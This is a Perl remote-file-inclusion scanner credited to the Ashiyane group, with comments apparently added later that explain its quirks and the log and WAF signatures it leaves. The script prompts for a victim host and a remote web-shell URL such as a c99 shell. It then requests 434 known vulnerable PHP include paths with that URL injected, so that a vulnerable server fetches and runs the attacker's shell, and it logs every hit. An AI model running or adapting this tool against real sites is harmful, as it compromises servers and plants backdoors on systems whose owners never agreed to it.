
RFI Scanner Em Perl

#!/usr/bin/perl


# RFI Web Comp v.1 - Public Version
# Code by Virangar / bl4ck.sc0rpi0n
# Contact: blackcode.writer[at]yahoo.com
# Ashiyane Digital Security Team
# ...::: Ashiyane [ online resource of security - ????? ????? ? ??? ??? ?????? ?? ??] :::...

use HTTP::Request;
use LWP::UserAgent;

# Clear the console before the banner is printed.  $^O is the OS name
# perl was built for; if its lower-cased form contains "win" the Windows
# console commands run, otherwise "clear".  Note that "darwin" also
# contains "win", so macOS takes the Windows branch.
sub lw
{
    my $looks_like_windows = index(lc $^O, 'win') != -1;
    if ($looks_like_windows) {
        system("cls");
        system ("title RFI Web Comp v.1 - ");
        system ("color 02");
    }
    else {
        system("clear");
    }
}

lw();

# Banner.
print "\t\t$_\n\n" for (
    '############################################# ###################',
    '# RFI Web Comp .v1 - Ashiyane Digital Security Team #',
    '# by Virangar & bl4ck.sc0rpi0n #',
    '############################################# ###################',
);

# Read one line typed by the operator and drop its trailing newline.
sub _read_line {
    my $line = <STDIN>;
    chomp $line;
    return $line;
}

# Target base URL.  Only the literal "http:" scheme is recognised; any
# other input gets "http://" prepended verbatim.  A trailing "/" is
# ensured so the probe paths can be appended directly.
print "Insert host:(ex: http://www.site.com/)\n";
$host = _read_line();
print "\n";
$host = 'http://' . $host unless $host =~ m{\Ahttp:};
$host .= '/'              unless $host =~ m{/$};

# URL of the remote file each probe points at; same scheme handling.
print "Insert shell:(ex: http://www.site.com/c99.txt)\n";
$shell = _read_line();
print "\n";
$shell = 'http://' . $shell unless $shell =~ m{\Ahttp:};

# Pattern the scan loop looks for in each response body.
print "Insert string search:(ex: c99shell)\n";
$string = _read_line();
print "\n\n";

print join '',
    "Your config:\n\n",
    " Victim: $host \n",
    " Url Shell: $shell \n",
    " Search String: $string \n\n",
    "Scan...\n\n";

# Probe table: $vuln1 .. $vuln434, read back by symbolic reference in the
# scan loop below.  Each value is a relative script path plus the query
# parameter the loop fills with the shell URL, so every probe puts a full
# "http://..." URL inside a query string -- the signature that web-server
# log review and WAF rules for remote-file-inclusion attempts match on.
# The table is not de-duplicated (many entries repeat verbatim), the
# numbering skips 27, and 353 is assigned twice, so the loop bound (435)
# is not the number of distinct probes.
$vuln1="includes/header.php?systempath=";
$vuln2="amboro/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";
$vuln3="index.inc.php?PATH_Includes=";
$vuln4="nphp/nphpd.php?nphp_config[LangFile]=";
$vuln5="include/db.php?GLOBALS[rootdp]=";
$vuln6="ashnews.php?pathtoashnews=";
$vuln7="ashheadlines.php?pathtoashnews=";
$vuln8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln9="demo/includes/init.php?user_inc=";
$vuln10="jaf/index.php?show=";
$vuln11="inc/shows.inc.php?cutepath=";
$vuln12="poll/admin/common.inc.php?base_path=";
$vuln13="pollvote/pollvote.php?pollname=";
$vuln14="sources/post.php?fil_config=";
$vuln15="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln16="bb_lib/checkdb.inc.php?libpach=";
$vuln17="include/livre_include.php?no_connect=lol&chem_absolu=";
$vuln18="index.php?from_market=Y&pageurl=";
$vuln19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln20="pivot/modules/module_db.php?pivot_path=";
$vuln21="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln22="derniers_commentaires.php?rep=";
$vuln23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln26="coppermine/themes/maze/theme.php?THEME_DIR=";
# NOTE: the numbering skips 27; $vuln27 is never assigned, so iteration
# 27 of the scan loop requests "$host$shell?" with no probe path.
$vuln28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$vuln29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$vuln30="myPHPCalendar/admin.php?cal_dir=";
$vuln31="agendax/addevent.inc.php?agendax_path=";
$vuln32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln34="main.php?page=";
$vuln35="default.php?page=";
$vuln36="index.php?action=";
$vuln37="index1.php?p=";
$vuln38="index2.php?x=";
$vuln39="index2.php?content=";
$vuln40="index.php?conteudo=";
$vuln41="index.php?cat=";
$vuln42="include/new-visitor.inc.php?lvc_include_dir=";
$vuln43="modules/agendax/addevent.inc.php?agendax_path=";
$vuln44="shoutbox/expanded.php?conf=";
$vuln45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln46="pivot/modules/module_db.php?pivot_path=";
$vuln47="library/editor/editor.php?root=";
$vuln48="library/lib.php?root=";
$vuln49="e107/e107_handlers/secure_img_render.php?p=";
$vuln50="zentrack/index.php?configFile=";
$vuln51="main.php?x=";
$vuln52="becommunity/community/index.php?pageurl=";
$vuln53="GradeMap/index.php?page=";
$vuln54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$vuln55="calendar/calendar.php?serverPath=";
$vuln56="calendar/functions/popup.php?serverPath=";
$vuln57="calendar/events/header.inc.php?serverPath=";
$vuln58="calendar/events/datePicker.php?serverPath=";
$vuln59="calendar/setup/setupSQL.php?serverPath=";
$vuln60="calendar/setup/header.inc.php?serverPath=";
$vuln61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$vuln62="zentrack/index.php?configFile=";
$vuln63="pivot/modules/module_db.php?pivot_path=";
$vuln64="inc/header.php/step_one.php?server_inc=";
$vuln65="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln66="inc/pipe.php?HCL_path=";
$vuln67="include/write.php?dir=";
$vuln68="include/new-visitor.inc.php?lvc_include_dir=";
$vuln69="includes/header.php?systempath=";
$vuln70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln71="coppercop/theme.php?THEME_DIR=";
$vuln72="zentrack/index.php?configFile=";
$vuln73="pivot/modules/module_db.php?pivot_path=";
$vuln74="inc/header.php/step_one.php?server_inc=";
$vuln75="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln76="inc/pipe.php?HCL_path=";
$vuln77="include/write.php?dir=";
$vuln78="include/new-visitor.inc.php?lvc_include_dir=";
$vuln79="includes/header.php?systempath=";
$vuln80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln81="coppercop/theme.php?THEME_DIR=";
$vuln82="becommunity/community/index.php?pageurl=";
$vuln83="shoutbox/expanded.php?conf=";
$vuln84="agendax/addevent.inc.php?agendax_path=";
$vuln85="myPHPCalendar/admin.php?cal_dir=";
$vuln86="yabbse/Sources/Packages.php?sourcedir=";
$vuln87="dotproject/modules/projects/addedit.php?root_dir=";
$vuln88="dotproject/modules/projects/view.php?root_dir=";
$vuln89="dotproject/modules/projects/vw_files.php?root_dir=";
$vuln90="dotproject/modules/tasks/addedit.php?root_dir=";
$vuln91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$vuln92="My_eGallery/public/displayCategory.php?basepath=";
$vuln93="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln94="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln96="modules/agendax/addevent.inc.php?agendax_path=";
$vuln97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln101="shoutbox/expanded.php?conf=";
$vuln102="pivot/modules/module_db.php?pivot_path=";
$vuln103="library/editor/editor.php?root=";
$vuln104="library/lib.php?root=";
$vuln105="e107/e107_handlers/secure_img_render.php?p=";
$vuln106="main.php?x=";
$vuln107="main.php?page=";
$vuln108="index.php?meio.php=";
$vuln109="index.php?include=";
$vuln110="index.php?inc=";
$vuln111="index.php?page=";
$vuln112="index.php?pag=";
$vuln113="index.php?p=";
$vuln114="index.php?x=";
$vuln115="index.php?open=";
$vuln116="index.php?visualizar=";
$vuln117="index.php?pagina=";
$vuln118="index2.php?content=";
$vuln119="inc/step_one_tables.php?server_inc=";
$vuln120="GradeMap/index.php?page=";
$vuln121="phpshop/index.php?base_dir=";
$vuln122="admin.php?cal_dir=";
$vuln123="contacts.php?cal_dir=";
$vuln124="convert-date.php?cal_dir=";
$vuln125="album_portal.php?phpbb_root_path=";
$vuln126="mainfile.php?MAIN_PATH=";
$vuln127="dotproject/modules/files/index_table.php?root_dir=";
$vuln128="html/affich.php?base=";
$vuln129="gallery/init.php?HTTP_POST_VARS=";
$vuln130="pm/lib.inc.php?pm_path=";
$vuln131="ideabox/include.php?gorumDir=";
$vuln132="index2.php?includes_dir=";
$vuln133="forums/toplist.php?phpbb_root_path=";
$vuln134="forum/toplist.php?phpbb_root_path=";
$vuln135="admin/config_settings.tpl.php?include_path=";
$vuln136="include/common.php?include_path=";
$vuln137="event/index.php?page=";
$vuln138="forum/index.php?includeFooter=";
$vuln139="forums/index.php?includeFooter=";
$vuln140="forum/bb_admin.php?includeFooter=";
$vuln141="forums/bb_admin.php?includeFooter=";
$vuln142="language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln144="blend_data/blend_common.php?phpbb_root_path=";
$vuln145="master.php?root_path=";
$vuln146="includes/kb_constants.php?module_root_path=";
$vuln147="forum/includes/kb_constants.php?module_root_path=";
$vuln148="forums/includes/kb_constants.php?module_root_path=";
$vuln149="classes/adodbt/sql.php?classes_dir=";
$vuln150="agenda.php3?rootagenda=";
$vuln151="agenda2.php3?rootagenda=";
$vuln152="sources/lostpw.php?CONFIG[path]=";
$vuln153="topsites/sources/lostpw.php?CONFIG[path]=";
$vuln154="toplist/sources/lostpw.php?CONFIG[path]=";
$vuln155="sources/join.php?CONFIG[path]=";
$vuln156="topsites/sources/join.php?CONFIG[path]=";
$vuln157="toplist/sources/join.php?CONFIG[path]=";
$vuln158="topsite/sources/join.php?CONFIG[path]=";
$vuln159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$vuln160="extras/poll/poll.php?file_newsportal=";
$vuln161="index.php?site_path=";
$vuln162="mail/index.php?site_path=";
$vuln163="fclick/show.php?path=";
$vuln164="show.php?path=";
$vuln165="calogic/reconfig.php?GLOBALS[CLPath]=";
$vuln166="eshow.php?Config_rootdir=";
$vuln167="auction/auction_common.php?phpbb_root_path=";
$vuln168="index.php?inc_dir=";
$vuln169="calendar/index.php?inc_dir=";
$vuln170="modules/TotalCalendar/index.php?inc_dir=";
$vuln171="modules/calendar/index.php?inc_dir=";
$vuln172="calendar/embed/day.php?path=";
$vuln173="ACalendar/embed/day.php?path=";
$vuln174="calendar/add_event.php?inc_dir=";
$vuln175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$vuln176="claroline/auth/ldap/authldap.php?includePath=";
$vuln177="docebo/modules/credits/help.php?lang=";
$vuln178="modules/credits/help.php?lang=";
$vuln179="config.php?returnpath=";
$vuln180="editsite.php?returnpath=";
$vuln181="in.php?returnpath=";
$vuln182="addsite.php?returnpath=";
$vuln183="includes/pafiledb_constants.php?module_root_path=";
$vuln184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$vuln185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$vuln186="auth/auth.php?phpbb_root_path=";
$vuln187="auth/auth_phpbb/phpbb_root_path=";
$vuln188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$vuln189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$vuln190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$vuln191="phpdig/includes/config.php?relative_script_path=";
$vuln192="includes/phpdig/includes/config.php?relative_script_path=";
$vuln193="includes/dbal.php?eqdkp_root_path=";
$vuln194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$vuln195="dkp/includes/dbal.php?eqdkp_root_path=";
$vuln196="include/SQuery/gameSpy2.php?libpath=";
$vuln197="include/global.php?GLOBALS[includeBit]=";
$vuln198="topsites/config.php?returnpath=";
$vuln199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$vuln200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$vuln201="forum/addpost_newpoll.php?thispath=";
$vuln202="forums/addpost_newpoll.php?thispath=";
$vuln203="ubbthreads/ubbt.inc.php?thispath=";
$vuln204="forums/ubbt.inc.php?thispath=";
$vuln205="forum/ubbt.inc.php?thispath=";
$vuln206="forum/admin/addentry.php?phpbb_root_path=";
$vuln207="admin/addentry.php?phpbb_root_path=";
$vuln208="index.php?f=";
$vuln209="index.php?act=";
$vuln210="ipchat.php?root_path=";
$vuln211="includes/orderSuccess.inc.php?glob[rootDir]=";
$vuln212="stats.php?dir[func]=dir[base]=";
$vuln213="ladder/stats.php?dir[base]=";
$vuln214="ladders/stats.php?dir[base]=";
$vuln215="sphider/admin/configset.php?settings_dir=";
$vuln216="admin/configset.php?settings_dir=";
$vuln217="vwar/admin/admin.php?vwar_root=";
$vuln218="modules/vwar/admin/admin.php?vwar_root=";
$vuln219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$vuln220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$vuln221="sphider/admin/configset.php?settings_dir=";
$vuln222="admin/configset.php?settings_dir=";
$vuln223="impex/ImpEata.php?systempath=";
$vuln224="forum/impex/ImpEata.php?systempath=";
$vuln225="forums/impex/ImpEata.php?systempath=";
$vuln226="application.php?base_path=";
$vuln227="index.php?theme_path=";
$vuln228="become_editor.php?theme_path=";
$vuln229="add.php?theme_path=";
$vuln230="bad_link.php?theme_path=";
$vuln231="browse.php?theme_path=";
$vuln232="detail.php?theme_path=";
$vuln233="fav.php?theme_path=";
$vuln234="get_rated.php?theme_path=";
$vuln235="login.php?theme_path=";
$vuln236="mailing_list.php?theme_path=";
$vuln237="new.php?theme_path=";
$vuln238="modify.php?theme_path=";
$vuln239="pick.php?theme_path=";
$vuln240="power_search.php?theme_path=";
$vuln241="rating.php?theme_path=";
$vuln242="register.php?theme_path=";
$vuln243="review.php?theme_path=";
$vuln244="rss.php?theme_path=";
$vuln245="search.php?theme_path=";
$vuln246="send_pwd.php?theme_path=";
$vuln247="sendmail.php?theme_path=";
$vuln248="tell_friend.php?theme_path=";
$vuln249="top_rated.php?theme_path=";
$vuln250="user_detail.php?theme_path=";
$vuln251="user_search.php?theme_path=";
$vuln252="invoice.php?base_path=";
$vuln253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$vuln254="cgi-bin/install/index.php?G_PATH=";
$vuln255="cgi-bin/include/print_category.php?dir=";
$vuln256="includes/class_template.php?quezza_root_path=";
$vuln257="bazar/classified_right.php?language_dir=";
$vuln258="classified_right.php?language_dir=";
$vuln259="phpBazar/classified_right.php?language_dir=";
$vuln260="chat/messagesL.php3?cmd=";
$vuln261="phpMyChat/chat/messagesL.php3?cmd=";
$vuln262="bbs/include/write.php?dir=";
$vuln263="visitorupload.php?cmd=";
$vuln264="modules/center/admin/accounts/process.php?module_path]=";
$vuln265="index.php?template=";
$vuln266="armygame.php?libpath=";
$vuln267="lire.php?rub=";
$vuln268="pathofhostadmin/?page=";
$vuln269="apa_phpinclude.inc.php?apa_module_basedi r=";
$vuln270="index.php?req_path=";
$vuln271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$vuln272="Farsi1/index.php?archive=";
$vuln273="index.php?archive=";
$vuln274="show_archives.php?template=";
$vuln275="forum/include/common.php?pun_root=";
$vuln276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$vuln277="vuln.php?=";
$vuln278="cgi-bin//include/write.php?dir=";
$vuln279="admin/common.inc.php?basepath=";
$vuln280="pm/lib.inc.php?sfx=";
$vuln281="pm/lib.inc.php?pm_path=";
$vuln282="artmedic-kleinanzeigen-path/index.php?id=";
$vuln283="osticket/include/main.php?include_dir=";
$vuln284="include/main.php?config[search_disp]=include_dir=";
$vuln285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$vuln286="quick_reply.php?phpbb_root_path=";
$vuln287="zboard/include/write.php?dir=";
$vuln288="admin/plog-admin-functions.php?configbasedir=";
$vuln289="content.php?content=";
$vuln290="q-news.php?id=";
$vuln291="_conf/core/common-tpl-vars.php?confdir=";
$vuln292="votebox.php?VoteBoxPath=";
$vuln293="al_initialize.php?alpath=";
$vuln294="include/db.php?GLOBALS[rootdp]=";
$vuln295="modules/news/archivednews.php?GLOBALS[language_home]=";
$vuln296="protection.php?siteurl=";
$vuln297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$vuln298="index2.php?includes_dir=";
$vuln299="classes.php?LOCAL_PATH=";
$vuln300="extensions/moblog/moblog_lib.php?basedir=";
$vuln301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln302="phpWebLog/include/init.inc.php?G_PATH=";
$vuln303="admin/objects.inc.php4?Server=";
$vuln304="trg_news30/trgnews/install/article.php?dir=";
$vuln305="block.php?Include=";
$vuln306="arpuivo.php?data=";
$vuln307="setup/index.php?GALLERY_BASEDIR=";
$vuln308="include/help.php?base=";
$vuln309="index.php?[Home]=";
$vuln310="block.php?Include=";
$vuln311="examples/phonebook.php?page=";
$vuln312="PHPNews/auth.php?path=";
$vuln313="include/print_category.php?dir=";
$vuln314="skin/zero_vote/login.php?dir=";
$vuln315="skin/zero_vote/setup.php?dir=";
$vuln316="skin/zero_vote/ask_password.php?dir=";
$vuln317="gui/include/sql.php?include_path=";
$vuln318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailread er_ini=";
$vuln319="email.php?login=cer_skin=";
$vuln320="PhotoGal/ops/gals.php?news_file=";
$vuln321="index.php?custom=";
$vuln322="loginout.php?cutepath=";
$vuln323="oneadmin/config.php?path[docroot]=";
$vuln324="xcomic/initialize.php?xcomicRootPath=";
$vuln325="skin/zero_vote/setup.php?dir=";
$vuln326="skin/zero_vote/error.php? dir=";
$vuln327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln333="src/index_overview.inc.php?config[path_src_include]=";
$vuln334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$vuln335="src/index_image.inc.php?config[path_src_include]=";
$vuln336="src/image-gd.class.php?config[path_src_include]=";
$vuln337="src/image.class.php?config[path_src_include]=";
$vuln338="src/album.class.php?config[path_src_include]=";
$vuln339="src/show_random.inc.php?config[path_src_include]=";
$vuln340="src/main.inc.php?config[path_src_include]=";
$vuln341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$vuln342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$vuln343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln349="src/index_overview.inc.php?config[path_src_include]=";
$vuln350="src/image-gd.class.php?config[path_src_include]=";
$vuln351="src/image.class.php?config[image_module]=";
$vuln352="src/album.class.php?config[path_src_include]=";
$vuln353="src/show_random.inc.php?config[path_src_include]=";
# NOTE: $vuln353 is reassigned here, so the value on the previous line is
# overwritten before the loop runs and is never probed.
$vuln353="src/main.inc.php?config[path_src_include]=";
$vuln354="includes/db_adodb.php?baseDir=";
$vuln355="includes/db_connect.php?baseDir=";
$vuln356="includes/session.php?baseDir=";
$vuln357="modules/projects/gantt.php?dPconfig[root_dir]=";
$vuln358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$vuln359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$vuln360="modules/admin/vw_usr_roles.php?baseDir=";
$vuln361="modules/public/calendar.php?baseDir=";
$vuln362="modules/public/date_format.php?baseDir=";
$vuln363="modules/tasks/gantt.php?baseDir=";
$vuln364="mantis/login_page.php?g_meta_include_file=";
$vuln365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$vuln366="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln367="dotproject/modules/files/index_table.php?root_dir=";
$vuln368="nukebrowser.php?filnavn=";
$vuln369="bug_sponsorship_list_view_inc.php?t_core _path=";
$vuln370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$vuln372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln373="includes/calendar.php?phpc_root_path=";
$vuln374="includes/setup.php?phpc_root_path=";
$vuln375="phpBB/admin/admin_styles.php?mode=";
$vuln376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$vuln377="admin/lang.php?CMS_ADMIN_PAGE=";
$vuln378="inc/pipe.php?HCL_path=";
$vuln379="include/write.php?dir=";
$vuln380="becommunity/community/index.php?pageurl=";
$vuln381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln383="modules/agendax/addevent.inc.php?agendax_path=";
$vuln384="shoutbox/expanded.php?conf=";
$vuln385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln386="index.php?page=";
$vuln387="index.php?pag=";
$vuln388="index.php?include=";
$vuln389="index.php?content=";
$vuln390="index.php?cont=";
$vuln391="index.php?c=";
$vuln392="modules/My_eGallery/index.php?basepath=";
$vuln393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$vuln394="journal.php?m=";
$vuln395="index.php?m=";
$vuln396="links.php?c=";
$vuln397="forums.php?m=";
$vuln398="list.php?c=";
$vuln399="user.php?xoops_redirect=";
$vuln400="index.php?id=";
$vuln401="r.php?url=";
$vuln402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$vuln403="inc/formmail.inc.php?script_root=";
$vuln404="include/init.inc.php?G_PATH=";
$vuln405="backend/addons/links/index.php?PATH=";
$vuln406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$vuln407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln408="protection.php?siteurl=";
$vuln409="htmltonuke.php?filnavn=";
$vuln410="mail_autocheck.php?pm_path=";
$vuln411="index.php?p=";
$vuln412="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln413="e107/e107_handlers/secure_img_render.php?p=";
$vuln414="include/new-visitor.inc.php?lvc_include_dir=";
$vuln415="community/modules/agendax/addevent.inc.php?agendax_path=";
$vuln416="library/editor/editor.php?root=";
$vuln417="library/lib.php?root=";
$vuln418="zentrack/index.php?configFile=";
$vuln419="pivot/modules/module_db.php?pivot_path=";
$vuln420="myPHPCalendar/admin.php?cal_dir=";
$vuln421="index.php/main.php?x=";
$vuln422="os/pointer.php?url=";
$vuln423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$vuln424="db.php?path_local=";
$vuln425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$vuln426="index.php?kietu[url_hit]=";
$vuln427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$vuln428="Sources/Packages.php?sourcedir=";
$vuln429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln430="cgi-bin//gadgets/Blog/BlogModel.php?path=";
$vuln431="Gallery/displayCategory.php?basepath=";
$vuln432="load_phplib.php?_PHPLIB[libdir]=";
$vuln433="main_prepend.php?_SERWEB[functionsdir]=";
$vuln434="load_lang.php?_SERWEB[configdir]=";



# Scan loop: one HTTP GET per $vulnN entry, N = 1 .. 434.  $i is a
# package global (no `my`), like every other variable in this script.
for ($i=1;$i<435;$i++)

{

# Build the variable name "vulnN": the bareword `vuln` is concatenated
# with the counter, which only parses because the file never enables
# `use strict`.  The chomp is a no-op ($cont has no trailing newline).
$cont=vuln.$i;
chomp $cont;

print "$cont\n";

# Symbolic dereference of $vulnN (needs no strict 'refs').  The request
# URL is <host><path>?<param>=<shell-url>? -- a second absolute
# "http://..." URL embedded in the query string plus a trailing "?";
# that shape is what web-server log review and WAF rules for
# remote-file-inclusion attempts key on.  $vuln27 is never assigned, so
# iteration 27 requests "$host$shell?" with no probe path.
$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final);
# A fresh UserAgent per probe; nothing here overrides LWP's stock
# User-Agent header, so that is what the target's access log records.
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

# Only 2xx responses are inspected; errors and timeouts are skipped
# silently, with no output.
if ($response->is_success) {
# $string is interpolated unquoted and unanchored, so it is treated as a
# regex, not a literal: any metacharacters the operator typed are
# interpreted.
if( $response->content =~ /$string/){
# Two-arg open on a bareword handle with no error check; each hit is
# appended to results.txt in the current working directory, which is the
# on-disk artefact this tool leaves behind.
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}}

}
